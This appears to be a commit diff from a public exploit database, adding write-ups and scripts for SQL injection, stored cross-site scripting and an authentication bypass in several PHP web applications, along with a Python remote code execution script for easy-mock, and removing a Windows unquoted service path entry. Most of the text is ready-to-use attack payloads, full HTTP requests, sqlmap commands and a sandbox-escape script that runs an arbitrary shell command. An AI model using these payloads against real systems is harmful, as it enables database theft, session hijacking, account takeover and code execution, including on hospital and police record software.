DB: 2021-08-14

9 changes to exploits/shellcodes

ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
Simple Image Gallery System 1.0 - 'id' SQL Injection
RATES SYSTEM 1.0 - Authentication Bypass

exploits/php/webapps/50193.txt

@@ -0,0 +1,118 @@
+# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
+# Exploit Author: Andrey Stoykov
+# Software Link: https://www.4homepages.de/download-4images
+# Version: 1.8
+# Tested on: Linux
+
+
+
+Source Analysis:
+
+
+Line #658
+
+- User action defined
+
+if ($action == "findimages") {
+
+
+Line #661
+
+- Vulnerable condition
+
+$condition = "1=1";
+
+
+Line #654
+
+- Default limit 50
+
+show_input_row($lang['results_per_page'], "limitnumber", 50);
+
+
+
+Line #736
+
+- Define limit start
+
+$limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : "";
+if ($limitstart == "") {
+  $limitstart = 0;
+
+
+Line #743
+
+- Define limit number
+
+$limitnumber = trim($HTTP_POST_VARS['limitnumber']);
+  if ($limitnumber == "") {
+    $limitnumber = 5000;
+  }
+
+
+Line #763
+
+- Define user input variables
+
+$limitfinish = $limitstart + $limitnumber;
+
+
+
+Line #786
+
+- SQL statement
+
+$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")."
+            FROM ".IMAGES_TABLE." i
+            LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id)
+            WHERE $condition
+            ORDER BY $orderby $direction
+
+			// Vulnerable user input of limitnumber
+            LIMIT $limitstart, $limitnumber";
+
+
+Line #852
+
+- Display user input defined previously
+
+show_hidden_input("limitnumber", $limitnumber);
+
+
+
+Exploit POC:
+
+
+1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
+
+
+HTTP Request:
+
+POST /4images/admin/images.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 406
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages
+Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: frame
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+__csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
+
+
+
+HTTP Response:
+
+HTTP/1.1 200 OK
+...
+<b>XPATH syntax error: ':10.1.37-MariaDB'</b>

exploits/php/webapps/50195.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 12/08/2021
+# Exploit Author: Ömer Hasan Durmuş
+# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
+# Version: v1.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+Step 1 : Login to admin account in http://TARGET/ghpolice/login.php default credentials. (1111:admin123)
+Step 2 : Then click on the "Add Staff"
+Step 3 : Input "<img src=x onerror=alert(1)>" in the field "Firstname" or "Othernames"
+Step 4 : Click on "Save and Continue"
+Step 5 : Update page.

exploits/php/webapps/50196.txt

@@ -0,0 +1,54 @@
+# Exploit Title: Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
+# Date: 12/08/2021
+# Exploit Author: Ömer Hasan Durmuş
+# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
+# Version: v1.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+Step 1 : Login CID account in http://TARGET/ghpolice/login.php default credentials. (005:12345)
+STEP 2 : Send the following request
+or
+Use sqlmap : python sqlmap.py -u "
+http://TARGET/ghpolice/cid/casedetails.php?id=210728101"
+--cookie="PHPSESSID=ev8vn1d1de5hjrv9273dunao8j" --dbs -vv
+
+# Request
+
+GET
+/ghpolice/cid/casedetails.php?id=210728101'+AND+(SELECT+2115+FROM+(SELECT(SLEEP(5)))GQtj)+AND'gKJE'='gKJE
+HTTP/1.1
+Host: target.com
+Cache-Control: max-age=0
+sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
+sec-ch-ua-mobile: ?0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://target.com/ghpolice/cid/
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=ev8vn1d1de5hjrv9273dunao8j
+Connection: close
+
+# Response after 5 seconds
+
+HTTP/1.1 200 OK
+Date: Thu, 12 Aug 2021 21:32:47 GMT
+Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
+X-Powered-By: PHP/7.4.14
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 6913
+Connection: close
+Content-Type: text/html; charset=UTF-8
+...
+...
+...

exploits/php/webapps/50197.txt

@@ -0,0 +1,96 @@
+# Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
+# Date: 13.08.2021
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://care2x.org
+# Software Link: https://sourceforge.net/projects/care2002/
+# Version: =< 2.7 Alpha
+# Tested on: Linux/Windows
+# Researchers : Security For Everyone Team - https://securityforeveryone.com
+
+'''
+
+DESCRIPTION
+
+Stored Cross Site Scripting(XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters.
+
+
+Example: /modules/registration_admission/patient_register.php POST request
+
+Content-Disposition: form-data; name="date_reg"
+
+2021-07-29 12:15:59
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="title"
+
+asd
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_last"
+
+asd
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_first"
+
+asd
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_2"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_3"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_middle"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_maiden"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="name_others"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="date_birth"
+
+05/07/2021
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="sex"
+
+m
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="addr_str"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="addr_str_nr"
+
+XSS
+-----------------------------29836624427276403321197241205
+Content-Disposition: form-data; name="addr_zip"
+
+XSS
+---------------------
+ 
+If an attacker exploit this vulnerability, takeover any account wants.
+
+Payload Used:
+
+"><script>alert(document.cookie)</script>
+
+EXPLOITATION
+
+1- Login to Care2x Panel
+2- /modules/registration_admission/patient_register.php
+3- Use the payload vulnerable parameters.
+
+
+ABOUT SECURITY FOR EVERYONE TEAM
+
+We are a team that has been working on cyber security in the industry for a long time.
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
+
+'''

exploits/php/webapps/50198.txt

@@ -0,0 +1,47 @@
+# Exploit Title: Simple Image Gallery System 1.0 - 'id' SQL Injection
+# Date: 2020-08-12
+# Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
+# Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Description:
+Simple Image Gallery System 1.0 application is vulnerable to
+SQL injection via the "id" parameter on the album page.
+
+POC:
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Click on Albums page and select an albums if created or create
+by clicking on "Add New" on the top right and select the album.
+
+Step 3. Click on an image and capture the request in burpsuite.
+Now copy the request and save it as test.req .
+
+Step 4. Run the sqlmap command "sqlmap -r test.req --dbs
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: id=3' OR (SELECT 9448 FROM(SELECT
+COUNT(*),CONCAT(0x7178707071,(SELECT
+(ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND
+'qkau'='qkau
+---

exploits/php/webapps/50199.txt

@@ -0,0 +1,16 @@
+# Exploit Title: RATES SYSTEM 1.0 - Authentication Bypass
+# Date: 2020-08-13
+# Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
+# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14904&title=RATES+SYSTEM+in+PHP+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Description: The  authentication bypass vulnerability on the application allows an attacker to log in as Client. This vulnerability affects the "username" parameter on the client login page: http://localhost/rates/login.php
+
+Step 1: On the login page, simply use  the query inside the bracket ( ' OR 1 -- - ) as username
+
+Step 2: On the login page, use same query{ ' OR 1 -- -} or anything  as password
+
+All set you should be logged in as Client.

exploits/windows/local/50048.txt

@@ -1,39 +0,0 @@
-# Exploit Title: ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
-# Date: 2021-06-21
-# Exploit Author: Julio Aviña
-# Vendor Homepage: https://www.asus.com/
-# Software Link: https://dlcdnets.asus.com/pub/ASUS/LCD%20Monitors/MB16ACE/ASUS_DisplayWidget_3.4.0.036.exe.zip
-# Version: 3.4.0.036
-# Service File Version 1.0.0.1
-# Tested on: Windows 10 Pro x64 es 
-# Vulnerability Type: Unquoted Service Path
-
-
-# 1. To find the unquoted service path vulnerability
-
-C:\>wmic service where 'name like "%ASUSDisplayWidgetService%"' get displayname, pathname, startmode, startname
-
-DisplayName                                      PathName                                                                        StartMode  StartName
-ASUS DisplayWidget Service by Portrait Displays  C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe  Auto       LocalSystem
-
-# 2. To check service info:
-
-C:\>sc qc "ASUSDisplayWidgetService"
-[SC] QueryServiceConfig CORRECTO
-
-NOMBRE_SERVICIO: ASUSDisplayWidgetService
-        TIPO               : 10  WIN32_OWN_PROCESS
-        TIPO_INICIO        : 2   AUTO_START
-        CONTROL_ERROR      : 1   NORMAL
-        NOMBRE_RUTA_BINARIO: C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe
-        GRUPO_ORDEN_CARGA  :
-        ETIQUETA           : 0
-        NOMBRE_MOSTRAR     : ASUS DisplayWidget Service by Portrait Displays
-        DEPENDENCIAS       :
-        NOMBRE_INICIO_SERVICIO: LocalSystem
-
-
-# 3. Exploit:
-
-A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
-When restarting the service or the system, the inserted executable will run with elevated privileges.

exploits/windows/webapps/50194.py

@@ -0,0 +1,64 @@
+# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 12/08/2021
+# Exploit Author: LionTree
+# Vendor Homepage: https://github.com/easy-mock
+# Software Link: https://github.com/easy-mock/easy-mock
+# Version: 1.5.0-1.6.0
+# Tested on: windows 10(node v8.17.0)
+
+import requests
+import json
+import random
+import string
+
+target = 'http://127.0.0.1:7300'
+username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
+password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
+print(username)
+print(password)
+# can't see the result of command
+cmd = 'calc.exe'
+
+# register
+url = target + "/api/u/register"
+cookies = {"SSO_LANG_V2": "EN"}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
+json_data={"name": username, "password": password}
+requests.post(url, headers=headers, cookies=cookies, json=json_data)
+
+# login
+url = target + "/api/u/login"
+cookies = {"SSO_LANG_V2": "EN"}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
+json_data={"name": username, "password": password}
+req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
+login = json.loads(req)
+token = login['data']['token']
+
+# create project
+url = target + "/api/project/create"
+cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
+json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
+requests.post(url, headers=headers, cookies=cookies, json=json_data)
+
+# get project_id
+url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
+cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
+req = requests.get(url, headers=headers, cookies=cookies).text
+projects = json.loads(req)
+project_id = projects['data'][0]['_id']
+
+# create mock
+url = target + "/api/mock/create"
+cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
+json_data={"description": "poc", "method": "get", "mode": "{\n  'foo': 'Syntax Demo',\n  'name': function() {\n    return (function() {\n      TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n      try {\n        Object.preventExtensions(Buffer.from(\"\")).a = 1;\n      } catch (e) {\n        return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n      }\n    })();\n  }\n}", "project_id": project_id, "url": "/" + username}
+requests.post(url, headers=headers, cookies=cookies, json=json_data)
+
+# preview mock
+url = target + "/mock/{}/{}/{}".format(project_id,username,username)
+cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
+headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
+requests.get(url, headers=headers, cookies=cookies)

files_exploits.csv

@@ -11374,7 +11374,6 @@ id,file,description,date,author,type,platform,port
 50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
-50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
 50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,
 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux,
@@ -44322,3 +44321,10 @@ id,file,description,date,author,type,platform,port
 50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
 50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
 50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,
+50193,exploits/php/webapps/50193.txt,"4images 1.8 - 'limitnumber' SQL Injection (Authenticated)",2021-08-13,"Andrey Stoykov",webapps,php,
+50194,exploits/windows/webapps/50194.py,"easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)",2021-08-13,LionTree,webapps,windows,
+50195,exploits/php/webapps/50195.txt,"Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-13,"Ömer Hasan Durmuş",webapps,php,
+50196,exploits/php/webapps/50196.txt,"Police Crime Record Management System 1.0 - 'casedetails' SQL Injection",2021-08-13,"Ömer Hasan Durmuş",webapps,php,
+50197,exploits/php/webapps/50197.txt,"Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS",2021-08-13,securityforeveryone.com,webapps,php,
+50198,exploits/php/webapps/50198.txt,"Simple Image Gallery System 1.0 - 'id' SQL Injection",2021-08-13,"Azumah Foresight Xorlali",webapps,php,
+50199,exploits/php/webapps/50199.txt,"RATES SYSTEM 1.0 - Authentication Bypass",2021-08-13,"Azumah Foresight Xorlali",webapps,php,